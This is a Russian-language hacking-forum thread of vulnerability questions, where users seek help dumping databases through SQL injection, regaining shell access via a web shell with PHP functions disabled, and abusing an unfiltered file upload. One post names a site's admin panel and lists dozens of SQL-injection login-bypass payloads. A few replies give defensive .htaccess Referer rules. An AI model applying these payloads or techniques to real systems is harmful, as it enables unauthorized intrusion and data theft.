Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. garrik

    garrik New Member

    Joined:
    1 Jul 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Господа, такой вопрос: есть инъекция, позволяющая выводить содержимое любой ячейки таблицы в поле формы на веб-странице (после "правильного" POST-запроса). Как можно слить через эту лазейку всю базу ? Структура таблиц базы известна. Есть ли тулза какая-то для этого или нужно самому писать скрипт ?
     
  2. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    sqlmap
     
    Muracha, Gorev and garrik like this.
  3. gena ryzhov

    gena ryzhov Member

    Joined:
    18 Dec 2013
    Messages:
    17
    Likes Received:
    8
    Reputations:
    0
    Всем доброй ночи!
    хочу вернуть доступ к консоли через веб шелл, ранее юзал mail(), а потом mb_send_mail(), их закрыли, уже все функции в доках перерыл, не нашел ничего, open_basedir от корня сайта и /tmp , через бд файлы не читаются

    Собственно модули апача и список выключенных функций:
    Loaded Apache modules: core, mod_so, http_core, mod_php5, mod_access_compat, mod_actions, mod_alias, mod_auth_basic, mod_authn_core, mod_authn_file, mod_authz_core, mod_authz_groupfile, mod_authz_host, mod_authz_user, mod_autoindex, mod_dir, mod_env, mod_filter, mod_headers, mod_include, mod_log_config, mod_logio, mod_mime, mod_negotiation, mod_remoteip, mod_rewrite, mod_setenvif, mod_status, mod_unixd, mod_userdir, mod_version, prefork, mod_ssl, mod_systemd, mod_cgi

    Disabled PHP Functions: exec,system,passthru,shell_exec,popen,show_source,posix_getpwuid,posix_setuid,posix_uname,cmd,escapeshellcmd,popen,proc_open,dbmopen,suexec,pcntl_exec,phpinfo,php_uname,mail,mb_send_mail


    Крик души! Если есть какие-нибудь варианты буду рад обсудить!
    P.S.
    Смотрю в сторону использования CGI , PERL, но ничего не смыслю в этом!
     
    #2143 gena ryzhov, 25 Nov 2017
    Last edited: 25 Nov 2017
  4. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    это как будто викторина без конца, по ключевым словам вопрос гуглится очень хорошо, если ты перепробуешь то что уже придумано, и это не работает, то стоит подкорректировать вопрос упомянув что уже было испробовано
     
    _________________________
    gena ryzhov likes this.
  5. MyNameIsWhoIsWho

    MyNameIsWhoIsWho New Member

    Joined:
    7 Jun 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ребят подскажите, нашел файл аплоад, но хз как отправить файл пост запросом)
    Хтмл формы для заливки нет.
    Как мне вообще создать запрос на отправку файла? И чем его отправить?
    Знаю что тупой вопрос, но почему то всегда игнорировал эту тему а теперь пришлось столкнуться

    Или ткните носом в инфу, полистал форум с гуглом, что-то не нашел
     
  6. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Плагином для лисы
     
    BabaDook and MyNameIsWhoIsWho like this.
  7. MyNameIsWhoIsWho

    MyNameIsWhoIsWho New Member

    Joined:
    7 Jun 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ничего не понял.
    Есть пхп скрипт, где загрузка файла не фильтруется. Параметр для пост запроса я знаю, просто пост запрос знаю как отправлять, но не знаю как отправлять файл пост запросом скрипту без хтмл формы
     
  8. MotherHacker

    MotherHacker New Member

    Joined:
    14 Oct 2017
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    Создаёшь файл на рабочем столе index.html
    Открываешь файл и пишешь:
    HTML:
    <form action="[ адрес скрипта аплоада ]" method="post">
    <input type="file" name="[ имя параметра ]">
    <input type="button" value="Залить">
    </form>
    
    Затем открываешь index.html в браузере
     
  9. gena ryzhov

    gena ryzhov Member

    Joined:
    18 Dec 2013
    Messages:
    17
    Likes Received:
    8
    Reputations:
    0
    <form enctype="multipart/form-data">

    http://htmlbook.ru/html/form/enctype
     
  10. MyNameIsWhoIsWho

    MyNameIsWhoIsWho New Member

    Joined:
    7 Jun 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0

    Я вкурсе, спасибо)
    Мне надо это было под массы заточить и отследить сам запрос, а не по одному ручками сидеть отправлять)


    Другой вопрос. Вот это добро можно как то привести в человеческий вид? Чтоб код читабельный был.


    http://clip2net.com/s/3PSUKqs
     
  11. MotherHacker

    MotherHacker New Member

    Joined:
    14 Oct 2017
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    Всё можно
    https://goo.gl/VneRw3
     
    MyNameIsWhoIsWho likes this.
  12. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Вась. Я тебя не понимаю, у тебя вопросы вообще адовые. Тебя так не помогут
     
    eminlayer7788, cat1vo and Gorev like this.
  13. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Можно сделать проверку Referer через .htaccess дабы получить защиту от CSRF ?
     
  14. Muracha

    Muracha Member

    Joined:
    30 Jul 2011
    Messages:
    153
    Likes Received:
    10
    Reputations:
    0
    Вот таой замечательный сайт
    cyber-cafe.ru/admin/
    вбить admin: admin - и тебе скажет, что нет логина и пароля. Есть вбить комбинации в сплойлере - выходит ошибка синтакс еррор. Вопрос к знатокам: действительно ли не получится авторизоваться, или нужен другой вектор?
    Или иногда ошибка бывает простой ошибкой без возможности авторизации?
    or 1=1
    or 1=1--
    or 1=1#
    or 1=1/*
    admin' --
    admin' #
    admin'/*
    admin' or '1'='1
    admin' or '1'='1'--
    admin' or '1'='1'#
    admin' or '1'='1'/*
    admin'or 1=1 or ''='
    admin' or 1=1
    admin' or 1=1--
    admin' or 1=1#
    admin' or 1=1/*
    admin') or ('1'='1
    admin') or ('1'='1'--
    admin') or ('1'='1'#
    admin') or ('1'='1'/*
    admin') or '1'='1
    admin') or '1'='1'--
    admin') or '1'='1'#
    admin') or '1'='1'/*
    1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
    admin" --
    admin" #
    admin"/*
    admin" or "1"="1
    admin" or "1"="1"--
    admin" or "1"="1"#
    admin" or "1"="1"/*
    admin"or 1=1 or ""="
    admin" or 1=1
    admin" or 1=1--
    admin" or 1=1#
    admin" or 1=1/*
    admin") or ("1"="1
    admin") or ("1"="1"--
    admin") or ("1"="1"#
    admin") or ("1"="1"/*
    admin") or "1"="1
    admin") or "1"="1"--
    admin") or "1"="1"#
    admin") or "1"="1"/*
    1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
     
  15. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Code:
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?site.com/.*
    RewriteRule .* - [F]
    
     
    Octavian and Gorev like this.
  16. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Что я сделол неправильно
    Code:
    <Directory /admin/>
        <files controler.php>
            RewriteEngine On
            RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?localhost/.*
            RewriteRule .* - [F]
        </files>
    </Directory>
     
  17. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Directory нельзя использовать в .htaccess, только в конфигурационном файле.

    Вот так можно попробовать:

    Code:
    <If "%{REQUEST_URI} == '/admin/controller.php'">
       RewriteEngine On
       RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?site.com/.*
       RewriteRule .* - [F]
    </If>
    
     
    Octavian likes this.
  18. johncena55

    johncena55 New Member

    Joined:
    3 Dec 2017
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Помогите пожалуйста.
    Нашел DB, нашел в ней таблицы, но при попытке найти колонны, соглашаюсь на поиск через файл перебором, выставляю 1 поток, но он очень быстро прогоняет и затем крашится. Снова можно эксплуатировать примерно через час, пытался загрузить прокси, не помогло. Может кто то сталкивался с этим? Еще нет DB Information_schema. Может тоже влияет на это?

     
    #2158 johncena55, 3 Dec 2017
    Last edited: 4 Dec 2017
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    вручную пробовал?
     
  20. johncena55

    johncena55 New Member

    Joined:
    3 Dec 2017
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Сделал только что так: вписал в текстовик только (email, password). Кастомный перебор, нашел эти 2 колонки. Краш прекратился, но попробовал дамп, получил ошибку..
    Названия нашлись, а вот нумерации нет, что это значит?